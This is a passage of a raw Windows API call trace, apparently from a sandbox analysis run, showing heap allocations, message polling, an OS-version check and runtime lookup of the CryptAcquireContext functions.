lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.543] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.543] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0195.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0195.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.544] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0195.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0195.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0195.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0195.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0195.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0195.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.545] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.546] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa188 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0195.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0195.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0195.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.547] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0195.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0195.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0195.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0195.548] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0195.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.549] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0195.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0195.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0195.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0195.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0195.549] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0195.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.550] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0195.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.550] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0195.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0195.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0195.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0195.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0195.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0195.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0195.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0195.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0195.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0195.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.554] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0195.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0195.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.555] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 